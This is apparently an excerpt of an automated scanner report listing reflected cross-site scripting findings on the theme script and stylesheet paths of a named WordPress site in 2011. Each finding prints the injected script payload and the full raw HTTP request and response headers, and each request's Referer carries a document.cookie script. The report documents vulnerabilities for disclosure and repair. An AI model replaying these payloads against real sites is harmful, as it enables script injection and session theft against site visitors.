HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:18:10 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:18:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44429
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dca80"><script>alert(1)</script>8d0a3cd6dd3 was submitted in the REST URL parameter 3. This input was echoed as dca80\"><script>alert(1)</script>8d0a3cd6dd3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wpdca80"><script>alert(1)</script>8d0a3cd6dd3/js/rokbox/themes/mynxx/rokbox-config.js HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:18:21 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:18:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44429
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3b28"><script>alert(1)</script>45adaa0beb was submitted in the REST URL parameter 4. This input was echoed as f3b28\"><script>alert(1)</script>45adaa0beb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/jsf3b28"><script>alert(1)</script>45adaa0beb/rokbox/themes/mynxx/rokbox-config.js HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:18:23 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:18:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44427
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e640"><script>alert(1)</script>9f16ced7beb was submitted in the REST URL parameter 5. This input was echoed as 6e640\"><script>alert(1)</script>9f16ced7beb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/js/rokbox6e640"><script>alert(1)</script>9f16ced7beb/themes/mynxx/rokbox-config.js HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:18:35 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:18:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44429
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce7de"><script>alert(1)</script>2ce3c9a591c was submitted in the REST URL parameter 6. This input was echoed as ce7de\"><script>alert(1)</script>2ce3c9a591c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themesce7de"><script>alert(1)</script>2ce3c9a591c/mynxx/rokbox-config.js HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:18:56 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:18:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44429
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d04b"><script>alert(1)</script>3b5c28bd57a was submitted in the REST URL parameter 7. This input was echoed as 4d04b\"><script>alert(1)</script>3b5c28bd57a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx4d04b"><script>alert(1)</script>3b5c28bd57a/rokbox-config.js HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:18:58 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:18:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44429
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba175"><script>alert(1)</script>3789058eab0 was submitted in the REST URL parameter 8. This input was echoed as ba175\"><script>alert(1)</script>3789058eab0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.jsba175"><script>alert(1)</script>3789058eab0 HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:19:10 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:19:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44429
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
1.249. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c650"><script>alert(1)</script>de1cab81c2b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5c650\"><script>alert(1)</script>de1cab81c2b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js?5c650"><script>alert(1)</script>de1cab81c2b=1 HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:16:50 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent Last-Modified: Mon, 31 Jan 2011 21:16:50 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44464
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9c52"><script>alert(1)</script>3d0d69d4637 was submitted in the REST URL parameter 1. This input was echoed as d9c52\"><script>alert(1)</script>3d0d69d4637 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-contentd9c52"><script>alert(1)</script>3d0d69d4637/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:17:48 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:17:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44429
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88d2f"><script>alert(1)</script>d565439d74f was submitted in the REST URL parameter 2. This input was echoed as 88d2f\"><script>alert(1)</script>d565439d74f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes88d2f"><script>alert(1)</script>d565439d74f/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:18:10 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:18:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44429
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32a12"><script>alert(1)</script>dea25148c67 was submitted in the REST URL parameter 3. This input was echoed as 32a12\"><script>alert(1)</script>dea25148c67 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp32a12"><script>alert(1)</script>dea25148c67/js/rokbox/themes/mynxx/rokbox-style.css HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:18:21 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:18:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44429
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59bef"><script>alert(1)</script>bfc1c1fb213 was submitted in the REST URL parameter 4. This input was echoed as 59bef\"><script>alert(1)</script>bfc1c1fb213 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/js59bef"><script>alert(1)</script>bfc1c1fb213/rokbox/themes/mynxx/rokbox-style.css HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:18:32 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:18:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44429
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eee2d"><script>alert(1)</script>3bc1486545 was submitted in the REST URL parameter 5. This input was echoed as eee2d\"><script>alert(1)</script>3bc1486545 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/js/rokboxeee2d"><script>alert(1)</script>3bc1486545/themes/mynxx/rokbox-style.css HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:18:44 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:18:44 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44427
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91e42"><script>alert(1)</script>e91bd0015f3 was submitted in the REST URL parameter 6. This input was echoed as 91e42\"><script>alert(1)</script>e91bd0015f3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes91e42"><script>alert(1)</script>e91bd0015f3/mynxx/rokbox-style.css HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:18:56 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:18:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44429
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b9db"><script>alert(1)</script>78d8e5b2272 was submitted in the REST URL parameter 7. This input was echoed as 4b9db\"><script>alert(1)</script>78d8e5b2272 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx4b9db"><script>alert(1)</script>78d8e5b2272/rokbox-style.css HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:18:58 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:18:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44429
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1817"><script>alert(1)</script>b8a0679b498 was submitted in the REST URL parameter 8. This input was echoed as c1817\"><script>alert(1)</script>b8a0679b498 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.cssc1817"><script>alert(1)</script>b8a0679b498 HTTP/1.1 Host: www.installsoftware.com Proxy-Connection: keep-alive Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Mon, 31 Jan 2011 21:19:10 GMT Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Pingback: http://www.installsoftware.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding,Cookie,User-Agent Last-Modified: Mon, 31 Jan 2011 21:19:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 44429
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
1.258. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [name of an arbitrarily supplied request parameter]previousnext
